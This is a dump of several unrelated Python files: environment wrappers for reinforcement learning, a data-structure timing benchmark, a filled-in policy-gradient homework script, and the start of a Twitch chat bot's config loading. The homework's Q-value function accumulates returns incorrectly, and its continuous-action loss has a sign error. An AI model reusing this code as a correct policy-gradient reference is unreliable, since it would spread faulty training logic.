obs, reward, done, info = self._env.step(action)
self._step += 1
if self._step >= self._duration:
done = True
if 'discount' not in info:
info['discount'] = np.array(1.0).astype(np.float32)
self._step = None
return obs, reward, done, info
def reset(self):
self._step = 0
return self._env.reset()
class ActionRepeat:
def __init__(self, env, amount):
self._env = env
self._amount = amount
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
done = False
total_reward = 0
current_step = 0
while current_step < self._amount and not done:
obs, reward, done, info = self._env.step(action)
total_reward += reward
current_step += 1
return obs, total_reward, done, info
class NormalizeActions:
def __init__(self, env):
self._env = env
self._mask = np.logical_and(
np.isfinite(env.action_space.low),
np.isfinite(env.action_space.high))
self._low = np.where(self._mask, env.action_space.low, -1)
self._high = np.where(self._mask, env.action_space.high, 1)
def __getattr__(self, name):
return getattr(self._env, name)
@property
def action_space(self):
low = np.where(self._mask, -np.ones_like(self._low), self._low)
high = np.where(self._mask, np.ones_like(self._low), self._high)
return gym.spaces.Box(low, high, dtype=np.float32)
def step(self, action):
original = (action + 1) / 2 * (self._high - self._low) + self._low
original = np.where(self._mask, original, action)
return self._env.step(original)
class ObsDict:
def __init__(self, env, key='obs'):
self._env = env
self._key = key
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
spaces = {self._key: self._env.observation_space}
return gym.spaces.Dict(spaces)
@property
def action_space(self):
return self._env.action_space
def step(self, action):
obs, reward, done, info = self._env.step(action)
obs = {self._key: np.array(obs)}
return obs, reward, done, info
def reset(self):
obs = self._env.reset()
obs = {self._key: np.array(obs)}
return obs
class OneHotAction:
def __init__(self, env):
assert isinstance(env.action_space, gym.spaces.Discrete)
self._env = env
def __getattr__(self, name):
return getattr(self._env, name)
@property
def action_space(self):
shape = (self._env.action_space.n,)
space = gym.spaces.Box(low=0, high=1, shape=shape, dtype=np.float32)
space.sample = self._sample_action
return space
def step(self, action):
index = np.argmax(action).astype(int)
reference = np.zeros_like(action)
reference[index] = 1
if not np.allclose(reference, action):
raise ValueError(f'Invalid one-hot action:\n{action}')
return self._env.step(index)
def reset(self):
return self._env.reset()
def _sample_action(self):
actions = self._env.action_space.n
index = self._random.randint(0, actions)
reference = np.zeros(actions, dtype=np.float32)
reference[index] = 1.0
return reference
class RewardObs:
def __init__(self, env):
self._env = env
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
spaces = self._env.observation_space.spaces
assert 'reward' not in spaces
spaces['reward'] = gym.spaces.Box(-np.inf, np.inf, dtype=np.float32)
return gym.spaces.Dict(spaces)
def step(self, action):
obs, reward, done, info = self._env.step(action)
obs['reward'] = reward
return obs, reward, done, info
def reset(self):
obs = self._env.reset()
obs['reward'] = 0.0
return obs
class Async:
_ACCESS = 1
_CALL = 2
_RESULT = 3
_EXCEPTION = 4
_CLOSE = 5
def __init__(self, ctor, strategy='process'):
self._strategy = strategy
if strategy == 'none':
self._env = ctor()
elif strategy == 'thread':
import multiprocessing.dummy as mp
elif strategy == 'process':
import multiprocessing as mp
else:
raise NotImplementedError(strategy)
if strategy != 'none':
self._conn, conn = mp.Pipe()
self._process = mp.Process(target=self._worker, args=(ctor, conn))
atexit.register(self.close)
self._process.start()
self._obs_space = None
self._action_space = None
@property
def observation_space(self):
if not self._obs_space:
self._obs_space = self.__getattr__('observation_space')
return self._obs_space
@property
def action_space(self):
if not self._action_space:
self._action_space = self.__getattr__('action_space')
return self._action_space
def __getattr__(self, name):
if self._strategy == 'none':
return getattr(self._env, name)
self._conn.send((self._ACCESS, name))
return self._receive()
def call(self, name, *args, **kwargs):
blocking = kwargs.pop('blocking', True)
if self._strategy == 'none':
return functools.partial(getattr(self._env, name), *args, **kwargs)
payload = name, args, kwargs
self._conn.send((self._CALL, payload))
promise = self._receive
return promise() if blocking else promise
def close(self):
if self._strategy == 'none':
try:
self._env.close()
except AttributeError:
pass
return
try:
self._conn.send((self._CLOSE, None))
self._conn.close()
except IOError:
# The connection was already closed.
pass
self._process.join()
def step(self, action, blocking=True):
return self.call('step', action, blocking=blocking)
def reset(self, blocking=True):
return self.call('reset', blocking=blocking)
def _receive(self):
try:
message, payload = self._conn.recv()
except ConnectionResetError:
raise RuntimeError('Environment worker crashed.')
# Re-raise exceptions in the main process.
if message == self._EXCEPTION:
stacktrace = payload
raise Exception(stacktrace)
if message == self._RESULT:
return payload
raise KeyError(f'Received message of unexpected type {message}')
def _worker(self, ctor, conn):
try:
env = ctor()
while True:
try:
# Only block for short times to have keyboard exceptions be raised.
if not conn.poll(0.1):
continue
message, payload = conn.recv()
except (EOFError, KeyboardInterrupt):
break
if message == self._ACCESS:
name = payload
result = getattr(env, name)
conn.send((self._RESULT, result))
continue
if message == self._CALL:
name, args, kwargs = payload
result = getattr(env, name)(*args, **kwargs)
conn.send((self._RESULT, result))
continue
if message == self._CLOSE:
assert payload is None
break
raise KeyError(f'Received message of unknown type {message}')
except Exception:
stacktrace = ''.join(traceback.format_exception(*sys.exc_info()))
print(f'Error in environment process: {stacktrace}')
conn.send((self._EXCEPTION, stacktrace))
conn.close()
|
benchmarkingv2.py
|
from datastructures import structures
import random, time, gc, threading
import traceback
import pathlib, sys
import platform
import numpy as np
MININT = -2147483648
MAXINT = 2147483647
def init_structure(name, preload = []):
kls = "datastructures.{0}.{0}".format(name)
parts = kls.split('.')
module = ".".join(parts[:-1])
m = __import__( module )
for comp in parts[1:]:
m = getattr(m, comp)
m.__init__(m, preload)
return m
def time_execution_thread(instance, func, values):
res = None
thread_return = {'Time': 0.0}
def compute(thread_return):
try:
start = time.time()
for i in values:
func(instance, i) # We might have to do something with this value to avoid optimizations
end = time.time()
thread_return['time'] = end - start
except Exception:
print(f"{i} {instance.size(instance)}")
exit(0)
p = threading.Thread(target=compute, args=(thread_return,))
p.start()
# Wait for 10 seconds or until process finishes
p.join(10)
if p.is_alive():
raise TimeoutError # We ran out of time
else:
return thread_return['time']
def time_execution(instance, func, values):
start = time.time()
for i in values:
func(instance, i) # We might have to do something with this value to avoid optimizations
end = time.time()
return end - start
N = 8
def run_benchmark(filename):
pathlib.Path('../results/timings/').mkdir(parents=True, exist_ok=True)
with open(f"../results/timings/{filename}.csv", "w") as f:
def write_csv_results(ds, n, op, num_ops, time_taken):
f.write(f"{ds},{n},{op},{num_ops},{time_taken}\n")
write_csv_results("DS", "Size", "Op", "OpCount", "Time(s)")
### DESTRUCTIVE METHODS #####################################
# We don't have a good way of measuring these under small n
# So results which ran faster than a threshold will get discarded
# As the measurement error will be too large.
l_preload_values = random.sample(range(MININT, MAXINT // 2), 10**N) # Limit the range so we can use it for adds without duplicates
for n in range(4, N):
preload_values = l_preload_values[:10**n]
deletes = 10**n - 1 if 10**n < 1000000 else 1000000 // n
delete_values = [random.randint(0, (len(preload_values) - i)) for i in range(1, deletes)] #Potentially move these into functions so they can be garbage cleaned and save ram. Might be a bit much right now
for ds in structures:
instance = init_structure(ds, preload_values)
try:
time_taken = time_execution(instance, instance.delete, delete_values)
except AssertionError as e:
print(f"{ds} Had an AssertionError doing deletion.")
continue
except TimeoutError as e:
print(f"{ds} was too slow and was skipped!")
continue
except Exception as e:
print(f"{ds} Had an exception doing deletion:\n{e}")
traceback.print_exc()
continue
print(f"{ds} took {time_taken}s for deleting {deletes} values")
write_csv_results(ds, 10**n, "Delete", deletes, time_taken)
del delete_values
f.flush()
for n in range(4, N):
for ds in structures:
preload_values = l_preload_values[:10**n]
instance = init_structure(ds, preload_values)
removes = 10**n if 10**n < 100000 else 1000000 // n
try:
time_taken = time_execution(instance, instance.remove, preload_values[:removes-1])
except AssertionError as e:
print(f"{ds} Had an AssertionError doing removal.")
continue
except TimeoutError as e:
print(f"{ds} was too slow and was skipped!")
continue
except Exception as e:
print(f"{ds} Had an exception doing removal:\n{e}")
traceback.print_exc()
continue
print(f"{ds} took {time_taken}s for removing {removes} values")
write_csv_results(ds, 10**n, "Remove", removes, time_taken)
f.flush()
for n in range(4, N):
preload_values = l_preload_values[:10**n]
adds = 10**n if 10**n < 100000 else 1000000 // n
add_values = [random.randint(MAXINT // 2 + 1, MAXINT) for i in range(adds)]
for ds in structures:
instance = init_structure(ds, preload_values)
try:
time_taken = time_execution(instance, instance.add, add_values)
except TimeoutError as e:
print(f"{ds} was too slow and was skipped!")
continue
print(f"{ds} took {time_taken}s for adding {adds} value")
write_csv_results(ds, 10**n, "Add", adds, time_taken)
del add_values
f.flush()
### NON-DESTRUCTIVE ####
# These methods should not modify the data structure
# and can therefore be called until they took at least 1 second to run.
for n in range(4, N):
preload_values = l_preload_values[:10**n]
if "PyPy" in platform.python_implementation(): #4 million is not enough for pypy
select_values = [np.random.randint(0, len(preload_values)) for i in range(4194304 * 6)]
else:
select_values = [np.random.randint(0, len(preload_values)) for i in range(4194304)]# 4 million should be enough
for ds in structures:
selects = 64
instance = init_structure(ds, preload_values)
time_taken = 0
try:
while time_taken < 1:
time_taken = time_execution(instance, instance.select, select_values[:selects])
if time_taken < 1:
selects *= 2
except TimeoutError as e:
print(f"{ds} was too slow and was skipped!")
continue
print(f"{ds} took {time_taken}s for selecting {selects} value")
write_csv_results(ds, 10**n, "Select", selects, time_taken)
del select_values
f.flush()
# 4 million should be enough
for n in range(4, N):
preload_values = l_preload_values[:10**n]
rank_values = [preload_values[random.randint(0, len(preload_values) - 1)] for i in range(4194304)]
for ds in structures:
ranks = 64
instance = init_structure(ds, preload_values)
time_taken = 0
try:
while time_taken < 1:
time_taken = time_execution(instance, instance.rank, rank_values[:ranks])
if time_taken < 1:
ranks *= 2
except TimeoutError as e:
print(f"{ds} was too slow and was skipped!")
continue
print(f"{ds} took {time_taken}s for ranking {ranks} value")
write_csv_results(ds, 10**n, "Rank", ranks, time_taken)
del rank_values
f.flush()
l_preload_values.sort() # Just makes it easier from after this
for n in range(4, N):
preload_values = l_preload_values[:10**n]
successor_values = [preload_values[random.randint(1, len(preload_values) - 2)] for i in range(4194304)] # 4 million should be enough
for ds in structures:
successors = 64
instance = init_structure(ds, preload_values)
time_taken = 0
try:
while time_taken < 1:
time_taken = time_execution(instance, instance.successor, successor_values[:successors])
if time_taken < 1:
successors *= 2
except TimeoutError as e:
print(f"{ds} was too slow and was skipped!")
continue
print(f"{ds} took {time_taken}s for successor {successors} value")
write_csv_results(ds, 10**n, "Successor", successors, time_taken)
f.flush()
# We can just reuse the choices from before
for n in range(4, N):
preload_values = l_preload_values[:10**n]
predecessor_values = [preload_values[random.randint(1, len(preload_values) - 2)] for i in range(4194304)] # 4 million should be enough
for ds in structures:
predessors = 64
instance = init_structure(ds, preload_values)
time_taken = 0
try:
while time_taken < 1:
time_taken = time_execution(instance, instance.predecessor, predecessor_values[:predessors])
if time_taken < 1:
predessors *= 2
except TimeoutError as e:
print(f"{ds} was too slow and was skipped!")
continue
print(f"{ds} took {time_taken}s for predecessor {predessors} value")
write_csv_results(ds, 10**n, "Predecessor", predessors, time_taken)
del predecessor_values
f.flush()
gc.collect()
if __name__ == "__main__":
print(f"Testing structures: {structures}")
run_benchmark(sys.argv[1])
|
train_pg.py
|
import inspect
import math
import os
import time
from multiprocessing import Process
from typing import List
import gym
import numpy as np
import scipy.signal
import tensorflow as tf
import logz
# ============================================================================================#
# Utilities
# ============================================================================================#
def build_mlp(
input_placeholder,
output_size,
scope,
n_layers=2,
size=64,
activation=tf.tanh,
output_activation=None
):
# ========================================================================================#
# ----------SECTION 3----------
# Network building
#
# Your code should make a feedforward neural network (also called a multilayer perceptron)
# with 'n_layers' hidden layers of size 'size' units.
#
# The output layer should have size 'output_size' and activation 'output_activation'.
#
# Hint: use tf.layers.dense
# ========================================================================================#
with tf.variable_scope(scope):
l_hid = tf.layers.dense(inputs=input_placeholder, units=size, activation=activation)
for _ in range(1, n_layers - 1):
l_hid = tf.layers.dense(inputs=l_hid, units=size, activation=activation)
l_output = tf.layers.dense(inputs=l_hid, units=output_size, activation=output_activation)
# YOUR_CODE_HERE
return l_output
def pathlength(path):
return len(path["reward"])
# ============================================================================================#
# Policy Gradient
# ============================================================================================#
def train_PG(exp_name='',
env_name='CartPole-v0',
n_iter=100,
gamma=1.0,
min_timesteps_per_batch=1000,
max_path_length=None,
learning_rate=5e-3,
reward_to_go=True,
animate=True,
logdir=None,
normalize_advantages=True,
nn_baseline=False,
seed=0,
# network arguments
n_layers=1,
size=32
):
start = time.time()
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_PG)[0]
locals_ = locals()
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
# Make the gym environment
env = gym.make(env_name)
# Is this env continuous, or discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
# Maximum length for episodes
max_path_length = max_path_length or env.spec.max_episode_steps
# ========================================================================================#
# Notes on notation:
#
# Symbolic variables have the prefix sy_, to distinguish them from the numerical values
# that are computed later in the function
#
# Prefixes and suffixes:
# ob - observation
# ac - action
# _no - this tensor should have shape (batch size /n/, observation dim)
# _na - this tensor should have shape (batch size /n/, action dim)
# _n - this tensor should have shape (batch size /n/)
#
# Note: batch size /n/ is defined at runtime, and until then, the shape for that axis
# is None
# ========================================================================================#
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
# ========================================================================================#
# ----------SECTION 4----------
# Placeholders
#
# Need these for batch observations / actions / advantages in policy gradient loss function.
# ========================================================================================#
sy_ob_no = tf.placeholder(shape=[None, ob_dim], name="ob", dtype=tf.float32)
if discrete:
sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32)
else:
sy_ac_na = tf.placeholder(shape=[None, ac_dim], name="ac", dtype=tf.float32)
# Define a placeholder for advantages
sy_adv_n = tf.placeholder(shape=[None], name="adv", dtype=tf.float32)
# ========================================================================================#
# ----------SECTION 4----------
# Networks
#
# Make symbolic operations for
# 1. Policy network outputs which describe the policy distribution.
# a. For the discrete case, just logits for each action.
#
# b. For the continuous case, the mean / log std of a Gaussian distribution over
# actions.
#
# Hint: use the 'build_mlp' function you defined in utilities.
#
# Note: these ops should be functions of the placeholder 'sy_ob_no'
#
# 2. Producing samples stochastically from the policy distribution.
# a. For the discrete case, an op that takes in logits and produces actions.
#
# Should have shape [None]
#
# b. For the continuous case, use the reparameterization trick:
# The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
#
# mu + sigma * z, z ~ N(0, I)
#
# This reduces the problem to just sampling z. (Hint: use tf.random_normal!)
#
# Should have shape [None, ac_dim]
#
# Note: these ops should be functions of the policy network output ops.
#
# 3. Computing the log probability of a set of actions that were actually taken,
# according to the policy.
#
# Note: these ops should be functions of the placeholder 'sy_ac_na', and the
# policy network output ops.
#
# ========================================================================================#
if discrete:
# YOUR_CODE_HERE
sy_logits_na = build_mlp(sy_ob_no, size=size, output_size=ac_dim, scope='policy', n_layers=n_layers)
sy_sampled_ac = tf.reshape(tf.multinomial(sy_logits_na, 1), [-1]) # Hint: Use the tf.multinomial op
sy_logprob_n = tf.nn.softmax_cross_entropy_with_logits(logits=sy_logits_na,
labels=tf.one_hot(sy_ac_na, depth=ac_dim))
else:
# YOUR_CODE_HERE
sy_mean = build_mlp(sy_ob_no, size=size, output_size=ac_dim, scope='policy', n_layers=n_layers)
sy_logstd = tf.get_variable(name='logstd', shape=[ac_dim], dtype=tf.float32, initializer=tf.initializers.ones,
trainable=True) # logstd should just be a trainable variable, not a network output.
sy_sampled_ac = tf.random_normal(shape=[None, ac_dim]) * tf.exp(sy_logstd) + sy_mean
c_log_2pi = math.log(math.pi * 2.0)
sy_logprob_n = -0.5 * (tf.square((sy_ac_na - sy_mean) / tf.exp(
sy_logstd)) + c_log_2pi + sy_logstd) # Hint: Use the log probability under a multivariate gaussian.
# ========================================================================================#
# ----------SECTION 4----------
# Loss Function and Training Operation
# ========================================================================================#
loss = tf.reduce_mean(
sy_logprob_n * sy_adv_n) # Loss function that we'll differentiate to get the policy gradient.
update_op = tf.train.AdamOptimizer(learning_rate).minimize(loss)
# ========================================================================================#
# ----------SECTION 5----------
# Optional Baseline
# ========================================================================================#
if nn_baseline:
baseline_prediction = tf.squeeze(build_mlp(
sy_ob_no,
1,
"nn_baseline",
n_layers=n_layers,
size=size))
# Define placeholders for targets, a loss function and an update op for fitting a
# neural network baseline. These will be used to fit the neural network baseline.
# YOUR_CODE_HERE
baseline_loss = tf.losses.mean_squared_error(sy_adv_n, baseline_prediction)
baseline_update_op = tf.train.AdamOptimizer(learning_rate).minimize(baseline_loss)
# ========================================================================================#
# Tensorflow Engineering: Config, Session, Variable initialization
# ========================================================================================#
tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
sess = tf.Session(config=tf_config)
sess.__enter__() # equivalent to `with sess:`
tf.global_variables_initializer().run() # pylint: disable=E1101
# ========================================================================================#
# Training Loop
# ========================================================================================#
total_timesteps = 0
for itr in range(n_iter):
print("********** Iteration %i ************" % itr)
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
paths = []
while True:
ob = env.reset()
obs, acs, rewards = [], [], []
animate_this_episode = (len(paths) == 0 and (itr % 10 == 0) and animate)
steps = 0
while True:
if animate_this_episode:
env.render()
time.sleep(0.05)
obs.append(ob)
ac = sess.run(sy_sampled_ac, feed_dict={sy_ob_no: ob[None]})
ac = ac[0]
acs.append(ac)
ob, rew, done, _ = env.step(ac)
rewards.append(rew)
steps += 1
if done or steps > max_path_length:
break
path = {"observation": np.array(obs),
"reward": np.array(rewards),
"action": np.array(acs)}
paths.append(path)
timesteps_this_batch += pathlength(path)
if timesteps_this_batch > min_timesteps_per_batch:
break
total_timesteps += timesteps_this_batch
# Build arrays for observation, action for the policy gradient update by concatenating
# across paths
ob_no = np.concatenate([path["observation"] for path in paths])
ac_na = np.concatenate([path["action"] for path in paths])
# ====================================================================================#
# ----------SECTION 4----------
# Computing Q-values
#
# Your code should construct numpy arrays for Q-values which will be used to compute
# advantages (which will in turn be fed to the placeholder you defined above).
#
# Recall that the expression for the policy gradient PG is
#
# PG = E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * (Q_t - b_t )]
#
# where
#
# tau=(s_0, a_0, ...) is a trajectory,
# Q_t is the Q-value at time t, Q^{pi}(s_t, a_t),
# and b_t is a baseline which may depend on s_t.
#
# You will write code for two cases, controlled by the flag 'reward_to_go':
#
# Case 1: trajectory-based PG
#
# (reward_to_go = False)
#
# Instead of Q^{pi}(s_t, a_t), we use the total discounted reward summed over
# entire trajectory (regardless of which time step the Q-value should be for).
#
# For this case, the policy gradient estimator is
#
# E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * Ret(tau)]
#
# where
#
# Ret(tau) = sum_{t'=0}^T gamma^t' r_{t'}.
#
# Thus, you should compute
#
# Q_t = Ret(tau)
#
# Case 2: reward-to-go PG
#
# (reward_to_go = True)
#
# Here, you estimate Q^{pi}(s_t, a_t) by the discounted sum of rewards starting
# from time step t. Thus, you should compute
#
# Q_t = sum_{t'=t}^T gamma^(t'-t) * r_{t'}
#
#
# Store the Q-values for all timesteps and all trajectories in a variable 'q_n',
# like the 'ob_no' and 'ac_na' above.
#
# ====================================================================================#
# YOUR_CODE_HERE
# q_n = TODO
def compute_q(path_rews: np.ndarray):
q_t = 0.0
ret_q = []
for r_t in path_rews[::-1]:
q_t += r_t + gamma * q_t
if reward_to_go:
ret_q.append(q_t)
return ret_q[::-1] if reward_to_go else [q_t] * len(path_rews)
q_n = np.concatenate([compute_q(path['reward']) for path in paths])
# ====================================================================================#
# ----------SECTION 5----------
# Computing Baselines
# ====================================================================================#
if nn_baseline:
# If nn_baseline is True, use your neural network to predict reward-to-go
# at each timestep for each trajectory, and save the result in a variable 'b_n'
# like 'ob_no', 'ac_na', and 'q_n'.
#
# Hint #bl1: rescale the output from the nn_baseline to match the statistics
# (mean and std) of the current or previous batch of Q-values. (Goes with Hint
# #bl2 below.)
q_n_mean = np.mean(q_n)
q_n_std = np.std(q_n)
b_n = sess.run(baseline_prediction, feed_dict={
sy_ob_no: ob_no,
})
b_n = b_n * q_n_std + q_n_mean
adv_n = q_n - b_n
else:
adv_n = q_n.copy()
# ====================================================================================#
# ----------SECTION 4----------
# Advantage Normalization
# ====================================================================================
if normalize_advantages:
# On the next line, implement a trick which is known empirically to reduce variance
# in policy gradient methods: normalize adv_n to have mean zero and std=1.
# YOUR_CODE_HERE
adv_n_mean = np.mean(adv_n)
adv_n_std = np.std(adv_n)
adv_n = (adv_n - adv_n_mean) / adv_n_std
# ====================================================================================#
# ----------SECTION 5----------
# Optimizing Neural Network Baseline
# ====================================================================================#
if nn_baseline:
# ----------SECTION 5----------
# If a neural network baseline is used, set up the targets and the inputs for the
# baseline.
#
# Fit it to the current batch in order to use for the next iteration. Use the
# baseline_update_op you defined earlier.
#
# Hint #bl2: Instead of trying to target raw Q-values directly, rescale the
# targets to have mean zero and std=1. (Goes with Hint #bl1 above.)
# YOUR_CODE_HERE
baseline_target = (q_n - q_n_mean) / q_n_std
_ = sess.run(baseline_update_op, feed_dict={
sy_ob_no: ob_no,
sy_adv_n: baseline_target,
})
# ====================================================================================#
# ----------SECTION 4----------
# Performing the Policy Update
# ====================================================================================#
# Call the update operation necessary to perform the policy gradient update based on
# the current batch of rollouts.
#
# For debug purposes, you may wish to save the value of the loss function before
# and after an update, and then log them below.
# YOUR_CODE_HERE
_ = sess.run(update_op, feed_dict={
sy_ob_no: ob_no,
sy_ac_na: ac_na,
sy_adv_n: adv_n,
})
# Log diagnostics
returns = [path["reward"].sum() for path in paths]
ep_lengths = [pathlength(path) for path in paths]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
logz.dump_tabular()
logz.pickle_tf_vars()
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='vpg')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=1.0)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-b', type=int, default=1000)
parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
parser.add_argument('--reward_to_go', '-rtg', action='store_true')
parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
parser.add_argument('--nn_baseline', '-bl', action='store_true')
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--n_layers', '-l', type=int, default=1)
parser.add_argument('--size', '-s', type=int, default=32)
args = parser.parse_args()
if not (os.path.exists('data')):
os.makedirs('data')
logdir = args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join('data', logdir)
if not (os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
for e in range(args.n_experiments):
seed = args.seed + 10 * e
print('Running experiment with seed %d' % seed)
def train_func():
train_PG(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
reward_to_go=args.reward_to_go,
animate=args.render,
logdir=os.path.join(logdir, '%d' % seed),
normalize_advantages=not (args.dont_normalize_advantages),
nn_baseline=args.nn_baseline,
seed=seed,
n_layers=args.n_layers,
size=args.size
)
# Awkward hacky process runs, because Tensorflow does not like
# repeatedly calling train_PG in the same thread.
p = Process(target=train_func, args=tuple())
p.start()
p.join()
if __name__ == "__main__":
main()
|
main.py
|
#!/usr/bin/python3
# coding=utf-8
import pymysql
import pydle
import random
from random import choice
import datetime
import time
from threading import Timer, Thread
import urllib.request
import requests
import json
import threading
import math
import functools
from string import ascii_letters
from collections import defaultdict, OrderedDict
from private_functions import validateImageURL, processImageURL, tokenGachaRoll
import sys
import re
import logging
import websocket
import _thread as thread
formatter = logging.Formatter('[%(asctime)s][%(name)s][%(levelname)s] %(message)s')
logger = logging.getLogger('nepbot')
logger.setLevel(logging.DEBUG)
logger.propagate = False
fh = logging.handlers.TimedRotatingFileHandler('debug.log', when='midnight', encoding='utf-8')
fh.setLevel(logging.DEBUG)
ch = logging.StreamHandler(sys.stdout)
ch.setLevel(logging.INFO)
fh.setFormatter(formatter)
ch.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(ch)
logging.getLogger('tornado.application').addHandler(fh)
logging.getLogger('tornado.application').addHandler(ch)
ffzws = 'wss://andknuckles.frankerfacez.com'
pool = pydle.ClientPool()
current_milli_time = lambda: int(round(time.time() * 1000))
pymysql.install_as_MySQLdb()
dbpw = None
dbname = None
dbhost = None
dbuser = None
silence = False
debugMode = False
streamlabsclient = None
twitchclientsecret = None
bannedWords = []
t = None
# read config values from file (db login etc)
try:
f = open("nepbot.cfg", "r")
lines = f.readlines()
for line in lines:
name, value = line.split("=")
value = str(value).strip("\n")
logger.info("Reading config value '%s' = '<redacted>'", name)
if name == "dbpassword":
dbpw = value
if name == "database":
dbname = value
if name == "dbhost":
dbhost = value
if name == "dbuser":
dbuser = value
if name == "streamlabsclient":
streamlabsclient = value
if name == "twitchclientsecret":
twitchclientsecret = value
if name == "log":
logger.info("Setting new console log level to %s", value)
ch.setLevel(logging.getLevelName(value))
if name == "silent" and value == "True":
logger.warning("Silent mode enabled")
silence = True
if name == "debugMode" and value == "True":
logger.warning("Debug mode enabled, !as command is available")
debugMode = True
if name == "bannedWords":
bannedWords = [word.lower() for word in value.split(",")]
if dbpw is None:
logger.error("Database password not set. Please add it to the config file, with 'dbpassword=<pw>'")
sys.exit(1)
if dbname is None:
logger.error("Database name not set. Please add it to the config file, with 'database=<name>'")
sys.exit(1)
if dbhost is None:
logger.error("Database host not set. Please add it to the config file, with 'dbhost=<host>'")
sys.exit(1)
if dbuser is None:
logger.error("Database user not set. Please add it to the config file, with 'dbuser=<user>'")
sys.exit(1)
if twitchclientsecret is None:
logger.error("Twitch Client Secret not set. Please add it to the conig file, with 'twitchclientsecret=<pw>'")
sys.exit(1)
f.close()
except Exception:
logger.error("Error reading config file (nepbot.cfg), aborting.")
sys.exit(1)
db = pymysql.connect(host=dbhost, user=dbuser, passwd=dbpw, db=dbname, autocommit="True", charset="utf8mb4")
admins = []
superadmins = []
activitymap = {}
marathonActivityMap = {}
blacklist = []
config = {}
packAmountRewards = {}
emotewaremotes = []
revrarity = {}
visiblepacks = ""
validalertconfigvalues = []
discordhooks = []
busyLock = threading.Lock()
discordLock = threading.Lock()
streamlabsLock = threading.Lock()
streamlabsauthurl = "https://www.streamlabs.com/api/v1.0/authorize?client_id=" + streamlabsclient + "&redirect_uri=https://marenthyu.de/cgi-bin/waifucallback.cgi&response_type=code&scope=alerts.create&state="
streamlabsalerturl = "https://streamlabs.com/api/v1.0/alerts"
alertheaders = {"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"}
time_regex = re.compile('(?P<hours>[0-9]*):(?P<minutes>[0-9]{2}):(?P<seconds>[0-9]{2})(\.(?P<ms>[0-9]{1,3}))?')
waifu_regex = None
def loadConfig():
global revrarity, blacklist, visiblepacks, admins, superadmins, validalertconfigvalues, waifu_regex, emotewaremotes, discordhooks, packAmountRewards
with db.cursor() as curg:
curg.execute("SELECT * FROM config")
logger.info("Importing config from database")
for row in curg.fetchall():
config[row[0]] = row[1]
logger.debug("Config: %s", str(config))
if int(config["emoteWarStatus"]) == 1:
# emote war active, get its emotes
curg.execute("SELECT name FROM emoteWar")
emotewaremotes = [row[0] for row in curg.fetchall()]
else:
emotewaremotes = []
alertRarityRange = range(int(config["drawAlertMinimumRarity"]), int(config["numNormalRarities"]))
validalertconfigvalues = ["color", "alertChannel", "defaultLength", "defaultSound", "setClaimSound",
"setClaimLength"] \
+ ["rarity%dLength" % rarity for rarity in alertRarityRange] \
+ ["rarity%dSound" % rarity for rarity in alertRarityRange]
waifu_regex = re.compile('(\[(?P<id>[0-9]+?)])?(?P<name>.+?) *- *(?P<series>.+) *- *(?P<rarity>[0-' + str(
int(config["numNormalRarities"]) + int(config["numSpecialRarities"]) - 1) + ']) *- *(?P<link>.+?)$')
logger.debug("Alert config values: %s", str(validalertconfigvalues))
logger.debug("Waifu regex: %s", str(waifu_regex))
logger.info("Fetching admin list...")
curg.execute("SELECT name, super FROM admins")
admins = []
superadmins = []
for row in curg.fetchall():
admins.append(row[0])
if row[1] != 0:
superadmins.append(row[0])
logger.debug("Admins: %s", str(admins))
logger.debug("SuperAdmins: %s", str(superadmins))
revrarity = {config["rarity" + str(i) + "Name"]: i for i in
range(int(config["numNormalRarities"]) + int(config["numSpecialRarities"]))}
curg.execute("SELECT name FROM blacklist")
rows = curg.fetchall()
blacklist = []
for row in rows:
blacklist.append(row[0])
# visible packs
curg.execute("SELECT name FROM boosters WHERE listed = 1 AND buyable = 1 ORDER BY sortIndex ASC")
packrows = curg.fetchall()
visiblepacks = "/".join(row[0] for row in packrows)
# discord hooks
with discordLock:
curg.execute("SELECT url FROM discordHooks ORDER BY priority DESC")
discrows = curg.fetchall()
discordhooks = [row[0] for row in discrows]
# pack amount rewards
packAmountRewards = {}
